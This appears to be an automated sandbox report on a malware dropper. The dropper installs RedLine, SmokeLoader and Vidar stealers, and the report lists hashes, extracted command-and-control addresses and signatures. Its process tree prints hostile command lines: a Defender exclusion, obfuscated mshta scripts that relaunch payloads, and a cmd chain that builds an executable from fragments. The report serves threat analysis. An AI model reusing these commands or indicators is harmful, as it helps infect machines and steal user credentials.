Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
13-10-2021 18:35
211013-w8lxmaegdr 1013-10-2021 12:38
211013-pvkdbadhdm 1013-10-2021 05:30
211013-f7nrtsdfa3 1012-10-2021 20:25
211012-y7qwasdbh4 1011-10-2021 21:02
211011-zvywtaabdq 10Analysis
-
max time kernel
36s -
max time network
603s -
platform
windows10_x64 -
resource
win10-ja-20210920 -
submitted
11-10-2021 21:02
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
26f28bf2dc2b6afc0dd99cb6ea3879b8
-
SHA1
9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05
-
SHA256
5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa
-
SHA512
5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b
Malware Config
Extracted
redline
she
135.181.129.119:4805
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
vidar
41.2
933
https://mas.to/@serg4325
-
profile_id
933
Extracted
vidar
41.3
903
https://mas.to/@oleg98
-
profile_id
903
Extracted
vidar
41.3
937
https://mas.to/@oleg98
-
profile_id
937
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2836 1180 rundll32.exe 127 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral6/memory/3972-216-0x0000000003430000-0x000000000344F000-memory.dmp family_redline behavioral6/memory/3972-227-0x0000000003A20000-0x0000000003A3D000-memory.dmp family_redline behavioral6/memory/4500-317-0x000000000041B236-mapping.dmp family_redline behavioral6/memory/3224-321-0x000000000041B23A-mapping.dmp family_redline behavioral6/memory/4500-352-0x0000000004F70000-0x0000000005576000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Zbot Generic URI/Header Struct .bin
suricata: ET MALWARE Zbot Generic URI/Header Struct .bin
-
Vidar Stealer 6 IoCs
resource yara_rule behavioral6/memory/3272-382-0x00000000007A0000-0x0000000000876000-memory.dmp family_vidar behavioral6/memory/3272-386-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar behavioral6/memory/1748-462-0x0000000000400000-0x000000000172D000-memory.dmp family_vidar behavioral6/memory/752-448-0x0000000003390000-0x0000000003466000-memory.dmp family_vidar behavioral6/memory/1748-442-0x0000000003360000-0x0000000003436000-memory.dmp family_vidar behavioral6/memory/752-469-0x0000000000400000-0x0000000001735000-memory.dmp family_vidar -
resource yara_rule behavioral6/files/0x000400000001abfd-123.dat aspack_v212_v242 behavioral6/files/0x000400000001abfd-124.dat aspack_v212_v242 behavioral6/files/0x000400000001abfe-122.dat aspack_v212_v242 behavioral6/files/0x000400000001ac00-129.dat aspack_v212_v242 behavioral6/files/0x000400000001ac00-128.dat aspack_v212_v242 behavioral6/files/0x000400000001abfe-127.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 29 IoCs
pid Process 1092 setup_installer.exe 1652 setup_install.exe 1476 Mon20762bc3f6.exe 1364 Mon209b3da1556b9a317.exe 3092 Mon20b6f9d5bd03a305.exe 2228 Mon203f01ac7e6.exe 3384 Mon20927aab1e5.exe 3300 Mon204014f13870f5e.exe 3972 Mon2083f8d8970a0b2d.exe 2936 Mon206d48916f93c5.exe 3340 Mon209c830507d573.exe 1144 Mon20d3b8b752.exe 4416 Mon206b909958ed4.exe 2932 LzmwAqmV.exe 2024 inst1.exe 4940 DownFlSetup110.exe 3272 Soft1ww01.exe 3932 4.exe 4544 setup.exe 3680 nK4aaCZE4tQcuszEO9z3RTLI.exe 3864 Chrome 5.exe 3876 1290819.scr 4852 7371162.scr 2408 setup.tmp 1532 09xU.exE 4500 Mon209c830507d573.exe 3224 Mon20927aab1e5.exe 5056 8767698.scr 760 setup.exe -
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Mon20d3b8b752.exe -
Loads dropped DLL 8 IoCs
pid Process 1652 setup_install.exe 1652 setup_install.exe 1652 setup_install.exe 1652 setup_install.exe 1652 setup_install.exe 1652 setup_install.exe 1652 setup_install.exe 2408 setup.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 7371162.scr -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Mon203f01ac7e6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 09xU.exE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com 51 ipinfo.io 53 ipinfo.io -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3340 set thread context of 4500 3340 Mon209c830507d573.exe 111 PID 3384 set thread context of 3224 3384 Mon20927aab1e5.exe 112 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
pid pid_target Process procid_target 4252 3932 WerFault.exe 110 1608 4416 WerFault.exe 95 3192 4416 WerFault.exe 95 4204 3344 WerFault.exe 150 5720 4416 WerFault.exe 95 5628 4416 WerFault.exe 95 2864 4416 WerFault.exe 95 4120 4416 WerFault.exe 95 3196 4416 WerFault.exe 95 6772 3272 WerFault.exe 109 7040 3428 WerFault.exe 156 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon204014f13870f5e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon204014f13870f5e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon204014f13870f5e.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 836 schtasks.exe 6172 schtasks.exe 1188 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 4960 taskkill.exe 5504 taskkill.exe 5624 taskkill.exe 7272 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3300 Mon204014f13870f5e.exe 3300 Mon204014f13870f5e.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 1144 Mon20d3b8b752.exe 5100 powershell.exe 2296 Process not Found 2296 Process not Found 3680 nK4aaCZE4tQcuszEO9z3RTLI.exe 3680 nK4aaCZE4tQcuszEO9z3RTLI.exe 3680 nK4aaCZE4tQcuszEO9z3RTLI.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3300 4ayFPPPanDu_Sh2LOTawhisg.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1364 Mon209b3da1556b9a317.exe Token: SeDebugPrivilege 2936 Mon206d48916f93c5.exe Token: SeDebugPrivilege 5100 powershell.exe Token: SeDebugPrivilege 4940 DownFlSetup110.exe Token: SeDebugPrivilege 3932 4.exe Token: SeShutdownPrivilege 2296 Process not Found Token: SeCreatePagefilePrivilege 2296 Process not Found Token: SeShutdownPrivilege 2296 Process not Found Token: SeCreatePagefilePrivilege 2296 Process not Found Token: SeDebugPrivilege 4252 WerFault.exe Token: SeRestorePrivilege 1608 WerFault.exe Token: SeBackupPrivilege 1608 WerFault.exe Token: SeBackupPrivilege 1608 WerFault.exe Token: SeDebugPrivilege 3876 1290819.scr -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4028 wrote to memory of 1092 4028 setup_x86_x64_install.exe 77 PID 4028 wrote to memory of 1092 4028 setup_x86_x64_install.exe 77 PID 4028 wrote to memory of 1092 4028 setup_x86_x64_install.exe 77 PID 1092 wrote to memory of 1652 1092 setup_installer.exe 78 PID 1092 wrote to memory of 1652 1092 setup_installer.exe 78 PID 1092 wrote to memory of 1652 1092 setup_installer.exe 78 PID 1652 wrote to memory of 4644 1652 setup_install.exe 81 PID 1652 wrote to memory of 4644 1652 setup_install.exe 81 PID 1652 wrote to memory of 4644 1652 setup_install.exe 81 PID 1652 wrote to memory of 4916 1652 setup_install.exe 82 PID 1652 wrote to memory of 4916 1652 setup_install.exe 82 PID 1652 wrote to memory of 4916 1652 setup_install.exe 82 PID 1652 wrote to memory of 3332 1652 setup_install.exe 83 PID 1652 wrote to memory of 3332 1652 setup_install.exe 83 PID 1652 wrote to memory of 3332 1652 setup_install.exe 83 PID 1652 wrote to memory of 4192 1652 setup_install.exe 84 PID 1652 wrote to memory of 4192 1652 setup_install.exe 84 PID 1652 wrote to memory of 4192 1652 setup_install.exe 84 PID 1652 wrote to memory of 4724 1652 setup_install.exe 85 PID 1652 wrote to memory of 4724 1652 setup_install.exe 85 PID 1652 wrote to memory of 4724 1652 setup_install.exe 85 PID 1652 wrote to memory of 4864 1652 setup_install.exe 86 PID 1652 wrote to memory of 4864 1652 setup_install.exe 86 PID 1652 wrote to memory of 4864 1652 setup_install.exe 86 PID 1652 wrote to memory of 4564 1652 setup_install.exe 87 PID 1652 wrote to memory of 4564 1652 setup_install.exe 87 PID 1652 wrote to memory of 4564 1652 setup_install.exe 87 PID 1652 wrote to memory of 4568 1652 setup_install.exe 88 PID 1652 wrote to memory of 4568 1652 setup_install.exe 88 PID 1652 wrote to memory of 4568 1652 setup_install.exe 88 PID 1652 wrote to memory of 4588 1652 setup_install.exe 89 PID 1652 wrote to memory of 4588 1652 setup_install.exe 89 PID 1652 wrote to memory of 4588 1652 setup_install.exe 89 PID 1652 wrote to memory of 3336 1652 setup_install.exe 90 PID 1652 wrote to memory of 3336 1652 setup_install.exe 90 PID 1652 wrote to memory of 3336 1652 setup_install.exe 90 PID 1652 wrote to memory of 4260 1652 setup_install.exe 91 PID 1652 wrote to memory of 4260 1652 setup_install.exe 91 PID 1652 wrote to memory of 4260 1652 setup_install.exe 91 PID 1652 wrote to memory of 4384 1652 setup_install.exe 92 PID 1652 wrote to memory of 4384 1652 setup_install.exe 92 PID 1652 wrote to memory of 4384 1652 setup_install.exe 92 PID 4260 wrote to memory of 1364 4260 cmd.exe 94 PID 4260 wrote to memory of 1364 4260 cmd.exe 94 PID 4916 wrote to memory of 1476 4916 cmd.exe 102 PID 4916 wrote to memory of 1476 4916 cmd.exe 102 PID 4916 wrote to memory of 1476 4916 cmd.exe 102 PID 4384 wrote to memory of 3092 4384 cmd.exe 97 PID 4384 wrote to memory of 3092 4384 cmd.exe 97 PID 4864 wrote to memory of 2228 4864 cmd.exe 103 PID 4864 wrote to memory of 2228 4864 cmd.exe 103 PID 4864 wrote to memory of 2228 4864 cmd.exe 103 PID 4724 wrote to memory of 3300 4724 cmd.exe 99 PID 4724 wrote to memory of 3300 4724 cmd.exe 99 PID 4724 wrote to memory of 3300 4724 cmd.exe 99 PID 4192 wrote to memory of 3384 4192 cmd.exe 96 PID 4192 wrote to memory of 3384 4192 cmd.exe 96 PID 4192 wrote to memory of 3384 4192 cmd.exe 96 PID 4588 wrote to memory of 3972 4588 cmd.exe 98 PID 4588 wrote to memory of 3972 4588 cmd.exe 98 PID 4588 wrote to memory of 3972 4588 cmd.exe 98 PID 4564 wrote to memory of 2936 4564 cmd.exe 101 PID 4564 wrote to memory of 2936 4564 cmd.exe 101 PID 4568 wrote to memory of 3340 4568 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS444B4626\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:4644
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20762bc3f6.exeMon20762bc3f6.exe5⤵
- Executes dropped EXE
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone4⤵PID:3332
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon206b909958ed4.exeMon206b909958ed4.exe /mixone5⤵
- Executes dropped EXE
PID:4416 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 6606⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 6766⤵
- Program crash
PID:3192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 7366⤵
- Program crash
PID:5720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 8006⤵
- Program crash
PID:5628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 8886⤵
- Program crash
PID:2864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 9326⤵
- Program crash
PID:4120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 11046⤵
- Program crash
PID:3196
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20927aab1e5.exeMon20927aab1e5.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3384 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20927aab1e5.exeC:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20927aab1e5.exe6⤵
- Executes dropped EXE
PID:3224
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon204014f13870f5e.exeMon204014f13870f5e.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3300
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon203f01ac7e6.exeMon203f01ac7e6.exe5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2228 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon203f01ac7e6.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵
- Checks whether UAC is enabled
PID:1740 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon203f01ac7e6.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon203f01ac7e6.exe") do taskkill /F -Im "%~NxU"7⤵PID:4464
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1532 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:4616
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:3256
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:3576
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:5312
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:6488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:6520
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:4264
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵PID:6372
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵PID:7788
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵PID:8112
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Mon203f01ac7e6.exe"8⤵
- Kills process with taskkill
PID:4960
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon206d48916f93c5.exeMon206d48916f93c5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209c830507d573.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon209c830507d573.exeMon209c830507d573.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3340 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon209c830507d573.exeC:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon209c830507d573.exe6⤵
- Executes dropped EXE
PID:4500
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon2083f8d8970a0b2d.exeMon2083f8d8970a0b2d.exe5⤵
- Executes dropped EXE
PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe4⤵PID:3336
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20d3b8b752.exeMon20d3b8b752.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:1144 -
C:\Users\Admin\Pictures\Adobe Films\nK4aaCZE4tQcuszEO9z3RTLI.exe"C:\Users\Admin\Pictures\Adobe Films\nK4aaCZE4tQcuszEO9z3RTLI.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3680
-
-
C:\Users\Admin\Pictures\Adobe Films\G9TYRlaApopi8cBjImqUDrvl.exe"C:\Users\Admin\Pictures\Adobe Films\G9TYRlaApopi8cBjImqUDrvl.exe"6⤵PID:1748
-
-
C:\Users\Admin\Pictures\Adobe Films\lxrZiEBramHe2BAjuCCTKiJi.exe"C:\Users\Admin\Pictures\Adobe Films\lxrZiEBramHe2BAjuCCTKiJi.exe"6⤵PID:4916
-
C:\Users\Admin\Pictures\Adobe Films\lxrZiEBramHe2BAjuCCTKiJi.exe"C:\Users\Admin\Pictures\Adobe Films\lxrZiEBramHe2BAjuCCTKiJi.exe"7⤵PID:652
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jDMSD6g_EX4gKVdl_JbMmmF6.exe"C:\Users\Admin\Pictures\Adobe Films\jDMSD6g_EX4gKVdl_JbMmmF6.exe"6⤵PID:752
-
-
C:\Users\Admin\Pictures\Adobe Films\vGhC45pqhnitqILzacnZ8CyD.exe"C:\Users\Admin\Pictures\Adobe Films\vGhC45pqhnitqILzacnZ8CyD.exe"6⤵PID:4640
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:7828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:5504
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\n4FV9LQITwmEylG4dOm5bKxS.exe"C:\Users\Admin\Pictures\Adobe Films\n4FV9LQITwmEylG4dOm5bKxS.exe"6⤵PID:1012
-
C:\Users\Admin\Pictures\Adobe Films\n4FV9LQITwmEylG4dOm5bKxS.exe"C:\Users\Admin\Pictures\Adobe Films\n4FV9LQITwmEylG4dOm5bKxS.exe"7⤵PID:4204
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FcvbR343t0fq4Wn0bZuqFG1O.exe"C:\Users\Admin\Pictures\Adobe Films\FcvbR343t0fq4Wn0bZuqFG1O.exe"6⤵PID:2672
-
-
C:\Users\Admin\Pictures\Adobe Films\E9FO1J_6uvSoAeK3rIcpnFrE.exe"C:\Users\Admin\Pictures\Adobe Films\E9FO1J_6uvSoAeK3rIcpnFrE.exe"6⤵PID:1924
-
-
C:\Users\Admin\Pictures\Adobe Films\LQ9ikJeXLwUr7dqRPFIfAlt2.exe"C:\Users\Admin\Pictures\Adobe Films\LQ9ikJeXLwUr7dqRPFIfAlt2.exe"6⤵PID:3428
-
C:\Users\Admin\Pictures\Adobe Films\LQ9ikJeXLwUr7dqRPFIfAlt2.exe"C:\Users\Admin\Pictures\Adobe Films\LQ9ikJeXLwUr7dqRPFIfAlt2.exe"7⤵PID:6952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 17567⤵
- Program crash
PID:7040
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0UHDLBG2hkCZO3lVcz1r88BN.exe"C:\Users\Admin\Pictures\Adobe Films\0UHDLBG2hkCZO3lVcz1r88BN.exe"6⤵PID:5152
-
-
C:\Users\Admin\Pictures\Adobe Films\xHp7KHlTtGAWndAvUGywfgyD.exe"C:\Users\Admin\Pictures\Adobe Films\xHp7KHlTtGAWndAvUGywfgyD.exe"6⤵PID:1148
-
-
C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe"C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe"6⤵PID:5136
-
